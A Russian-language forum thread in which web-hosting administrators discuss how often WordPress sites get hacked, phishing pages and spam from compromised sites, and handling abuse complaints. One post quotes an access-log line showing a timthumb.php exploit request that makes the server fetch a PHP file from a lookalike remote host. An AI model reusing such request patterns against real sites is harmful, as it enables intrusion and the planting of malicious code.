Проблемы хостеру от WordPress

У нас например 70% WP и 30% DLE

У моих клиентов почему-то DLE не пользуется популярностью, поэтому мало что про него знаю.

Ну ок, а что делаете с такими клиентами? Прогонять стыдно - они же не виноваты, что их ломают.

У меня уже начали появляться мысли запрета WordPress на хостинге. Чтобы не приходили даже - тогда и прогонять не придется.

Подтверждаю. Чаще всего WP ломают. Наша статистика 80% wp - 10% joomla и 10% DLE. Естественно всё приблизительно. А ломают потому что обновлять не умеют (не хотят) или пароли в фтп менеджере хранят. Но это вы и без меня знаете.

WP/Joomla примерно одинаково ломают.

В этом месяце вообще есть тренд на подбор пароля к админке CMS, и заливку шелла через нее.

Чекаем антивирусом и уведомляем клиентов до того как придет абуза.

а смысл гнать, вот недавно аналогично всплывал банковский фейк заныканный в wp, как раз таки они виноваты в том что не обновляют свои файлы, приходится помогать пинком в нужном направлении..

можно конечно и погнать если не предпринимают мер, за банковские фейки и сервер могут конфисковать запросто.

последний раз ломали через timthumb.php

112.215.36.175 - - [05/Nov/2012:07:32:57 +0400] "GET //wp-content/themes/cadabrapress/scripts/timthumb.php?src=http://flickr.com.slmseguros.es/content/png.php HTTP/1.1" 400 214 "-" "Mozilla/5.0 (Windows NT 6.1; rv:15.0) Gecko/20100101 Firefox/15.0.1"

я тут подумываю антивирус запустить в linux что бы хотя бы сигнализировал и удалял шеллы или написать скрипт который будет находить файлы в которых шифрованный код.

Антивирус не могу себе позволить - сервер упадет. Там миллионы файлов.

А пиннать сотни людей - это ж мне придется жить только этим вопросом.

ну вот по этой причине АВ пока не рискую поставить.

разве так часто ломают сайты? у нас конечно не 10к клиентов но 1.5к сайтов на наших серверах есть, я бы не сказал что абузят часто по факту взлома.

Все по тихоньку. В зависимости как клиент своевременно отновляет свои скрипты. Мы например постоянно пишем людям и напоминаем о серьезных обновленях в популярных движках. А куда деваться - лучший способ защиты от всякой вредной ерунды - это профилактика.

Вот за сегодня три жалобы. Два сайта прикинулись банками, один разослал 700 писем спама (это еще ладно хоть ограничения на отсылку есть, а то бы вообще устроил переполох).

А жалобы не простые: от Hetzner. Сами понимаете, что будет, если задолбать хецнеровцев проблемами.

В общем-то я на абузы трачу существенное количество времени. Основная их проблема - их разрешение не автоматизируется никак. Мне бы конечно хотелось заняться более важными проблемами, чем трата по часу на споры с каждым абузным клиентом.

Возможно, просто хостите 80% WP, 10% Джумлу и 10% ДЛЕ. Тогда к статистике это отношения не имеет.

А виноват в этом движок, да?

Ерунда. ВП менее дыряв, чем Джумла с ДЛЕ. Просто следить за обновлениями нужно и не наставлять плагинов неизвестных. Ну и общее - выставлять права на файлы, нормальные пароли с солью. Меня вон пытались ломать, ддосили, потом засыпали флудом так, что память ВПСки засирало за пару часов. И ничего, отстояла ВПшка. Не в движке дело, а в прокладке между стулом и клавиатурой.

Во какие картинки нашел: